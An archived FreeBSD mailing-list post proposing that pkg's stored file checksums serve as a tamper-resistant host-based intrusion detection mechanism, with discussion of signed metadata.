Date: Mon, 18 Apr 2016 11:29:31 +0100 From: Matthew Seaman <matthew@FreeBSD.org> To: freebsd-pkg@freebsd.org Subject: Intrusion Detection using pkg? Message-ID: <d9571b48-bea2-a791-c536-af9549166155@freebsd.org>
next in thread | raw e-mail | index | archive | help
This is an OpenPGP/MIME signed message (RFC 4880 and 3156) --VDbhUmvISrP5WuEpuNTPLXbsuS8mTd4Pg Content-Type: multipart/mixed; boundary="H6rP8Xv64qson3pbUXLHdRfp1kol2SW9E" From: Matthew Seaman <matthew@freebsd.org> To: freebsd-pkg@freebsd.org Message-ID: <d9571b48-bea2-a791-c536-af9549166155@freebsd.org> Subject: Intrusion Detection using pkg? --H6rP8Xv64qson3pbUXLHdRfp1kol2SW9E Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable Dear all, Has anybody been thinking about using pkg(8) as part of a host-based intrusion detection system? Particularly considering the impending switch to packaged base for 11.0-RELEASE. pkg(8) metadata contains the sha256 checksum of every file it has installed except for certain config files that the usr is expected to modify themselves. Running 'pkg check -sa' should detect anything that has been modified since it was installed. That's basically what a program like tripwire does. Unfortunately it's also very simple to run 'pkg check -ra' which would hide any local modifications. (The assumption here is that the system has already been compromised; the idea is to make sure that compromise doesn't go undetected.) What is needed is a secured mechanism to compare checksums against a tamper-proof (preferably off-line) store. We could pull the checksum data out of the signed package tarballs downloaded from the repo each time we wanted to run a secure check, but that depends on anyone not running 'pkg clean -a' or else that precise package still being available from the repo. Plus it's a lot of work to do that /every/ time we want to scan for changes. We don't, as far as I can tell, have any way of cryptographically verifying that package metadata, once loaded into a repo catalogue or the local package DB, has not subsequently been altered. That would entail something like creating a detached signature for every file in each installed package, which is just the file checksum encrypted using a trusted key-pair. It should be possible to generate that data on a package building system, but I don't know if the extra system load and increased size of package metadata makes the whole idea a non-starter. Thoughts? Cheers, Matthew --H6rP8Xv64qson3pbUXLHdRfp1kol2SW9E-- --VDbhUmvISrP5WuEpuNTPLXbsuS8mTd4Pg Content-Type: application/pgp-signature; name="signature.asc" Content-Description: OpenPGP digital signature Content-Disposition: attachment; filename="signature.asc" -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJXFLcLAAoJEABRPxDgqeTnemwP/23te0e6G6/6vHWpA6MsdUV8 /utBH5jJw4Q+Sz9xYQJvm70aJ0O5I5iFYE50zsf8ynuVaRGweMQt+MImAONfvWIC bF5oBJWow4F8c3Y2pl+w70bcsLbIekJt1DW/0yPXbhHFFEAV1AolKzFJc4WENU3T VpSwbdCPRePOIC8q7+mT/3WaLxfKNU1xOvsckmcVuFfuR59niD+IzFcgki5Uo2Ra fQJQZ8BiRC0Hp/DInnOxlWVZQkVXYsKTPluq/EjxHHAPFuTZXLJ0KuDY8B1WEGog WdNavXzsKyd7Sy6gJoaNLjjW3CiDoYgZTz2ZBH/YswDdG47pnJ4Ub7uLZQ/072/w xEQGuBguThc2SaIrIDoiulkP9TRLtjbVh+U6hfjF4Z/BBAyOjg1PH1hJoFVmtLCE mb+FjG1pbA5TEC+tqXyzWW/vbbTZv83CQDYSrofbUgF1TE7nKfn0NLXvlXCF9wF1 Q3pMmj9Yk6e5c31G9/q7qEoZFVEQjeNTB1NvgJq2r2yxYXEBheSL/2hgsqVVjHiS laraKjEFe33jbHQgGo4O+c2BDhaPj+VXMycRtihnL2e7fOpfaLO1PzvowzvHmeIE zDhfTZGRGD+bgTqrNFGFLrQaXGsN1f3f03TUZW6Q73nPPVyZOX4qzIt55GCD4GcO xqNAyNk5drsW94w82kue =q+Eq -----END PGP SIGNATURE----- --VDbhUmvISrP5WuEpuNTPLXbsuS8mTd4Pg--
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?d9571b48-bea2-a791-c536-af9549166155>